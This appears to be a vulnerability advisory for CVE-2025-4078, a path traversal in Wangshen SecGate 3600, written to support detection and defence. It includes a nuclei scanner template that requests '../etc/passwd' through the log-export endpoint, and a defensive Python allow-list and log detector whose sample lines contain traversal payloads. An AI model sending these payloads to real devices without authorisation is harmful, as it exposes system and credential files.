
Wangshen SecGate 3600 Path Traversal Vulnerability

CVE-2025-4078
Verified

Description

Wangshen SecGate 3600 2400 contains a path traversal vulnerability caused by manipulation of the 'file_name' argument of the '?g=log_export_file' endpoint, allowing remote attackers to read arbitrary files; exploitation requires remote network access to the device.

Severity

Medium

Published Date

February 11, 2026

Template Author

ark

CVE-2025-4078.yaml
id: CVE-2025-4078

info:
  name: Wangshen SecGate 3600 Path Traversal Vulnerability
  author: Ark
  severity: medium
  description: |
    Wangshen SecGate 3600 2400 contains a path traversal caused by manipulation of the 'file_name' argument in '?g=log_export_file', letting remote attackers access arbitrary files, exploit requires remote access.
  impact: |
    Remote attackers can access sensitive files on the system, potentially leading to information disclosure or system compromise.
  remediation: |
    Implement input validation and sanitize 'file_name' parameter; update to the latest firmware version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4078
    - https://vuldb.com/?id.295954
  metadata:
    verified: true
    max-request: 1
    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
  tags: cve,cve2025,wangshen,lfi,traversal,vuln,vkev

http:
  - raw:
      - |
        GET /?g=log_export_file&file_name=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
          - 'contains(content_type, "text/plain")'
        condition: and
# digest: 4a0a00473045022070b5b6da441274110c1174616e4ba757035a6e1696f87d767b092422cf4d5c31022100dcb56ce766c049a248f6a472412404fe0701a12353e8953459f0f3ba2a0e705d:922c64590222798bb761d5b6d8e72950
Severity

5.0

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2025-4078
https://vuldb.com/?id.295954

Remediation Steps

Implement input validation and sanitize the 'file_name' parameter; update to the latest firmware version if available.
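The remediation above and the nuclei template's request both turn on the same point: 'file_name' is joined to a path without being constrained to the export directory. The following is an added example (not code from the SecGate product or from the template) showing the two defensive pieces a practitioner would want here: a server-side check that accepts only allow-listed names and verifies the canonical path stays inside the export directory, and a detector that flags traversal attempts against the '?g=log_export_file' endpoint in access logs, including URL-encoded and double-encoded forms. The export directory path, the handler name and the log lines are constructed assumptions, not values from the page.

```python
"""Defensive handling of a file-export parameter such as 'file_name'.

Added example. EXPORT_DIR, the handler shape and SAMPLE_LOG are assumptions
constructed for illustration; only the endpoint and parameter names come
from the advisory.
"""
import re
from pathlib import Path
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical directory that log exports are served from (assumption).
EXPORT_DIR = Path("/srv/secgate/exports")

# Allow-list for the raw parameter: a bare file name, restricted charset,
# restricted extensions. '..', '/', '\\', '%' and NUL can never pass this.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:log|txt|gz)")


def resolve_export_path(file_name: str, base_dir: Path = EXPORT_DIR) -> Optional[Path]:
    """Return the export file's path inside base_dir, or None if rejected.

    Two independent checks: the allow-list on the raw value, then a
    containment check on the canonical path (symlinks resolved) so that a
    name which somehow slipped through still cannot escape base_dir.
    """
    if not _SAFE_NAME.fullmatch(file_name):
        return None
    base = base_dir.resolve()
    candidate = (base / file_name).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


# Traversal markers in raw or single-URL-encoded form.
_TRAVERSAL = re.compile(r"\.\.(?:[/\\]|%2f|%5c)|%2e%2e(?:[/\\]|%2f|%5c)", re.IGNORECASE)


def flags_traversal(request_line: str) -> bool:
    """True when a request line targets g=log_export_file with a traversal
    sequence in file_name. parse_qs decodes once; a second unquote() catches
    double-encoded payloads such as %252e%252e%252f."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return False
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("g", [""])[0] != "log_export_file":
        return False
    for value in query.get("file_name", []):
        if _TRAVERSAL.search(value) or _TRAVERSAL.search(unquote(value)):
            return True
    return False


# Constructed sample access-log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Feb/2026:10:00:01 +0000] "GET /?g=log_export_file&file_name=today.log HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Feb/2026:10:00:07 +0000] "GET /?g=log_export_file&file_name=../../../../../../../etc/passwd HTTP/1.1" 200 1823',
    '203.0.113.9 - - [11/Feb/2026:10:00:09 +0000] "GET /?g=log_export_file&file_name=%252e%252e%252fetc%252fshadow HTTP/1.1" 403 0',
    '198.51.100.2 - - [11/Feb/2026:10:01:00 +0000] "GET /?g=dashboard HTTP/1.1" 200 9001',
]

_REQUEST = re.compile(r'"([A-Z]+ [^"]* HTTP/[0-9.]+)"')


def suspicious_requests(lines: List[str]) -> List[str]:
    """Return the log lines whose request carries a traversal attempt against
    the log export endpoint. A 200 on such a line is the signal that the
    fix is missing; a 403 shows the input validation is working."""
    hits = []
    for line in lines:
        match = _REQUEST.search(line)
        if match and flags_traversal(match.group(1)):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print(resolve_export_path("today.log"))
    print(resolve_export_path("../../../../../../../etc/passwd"))
    for hit in suspicious_requests(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

The allow-list is deliberately stricter than "strip `..`": rejecting anything that is not a plain name with a known extension avoids the encoding and normalisation games that sanitising blacklists tend to lose, and the `relative_to` check is the backstop if the allow-list is ever loosened.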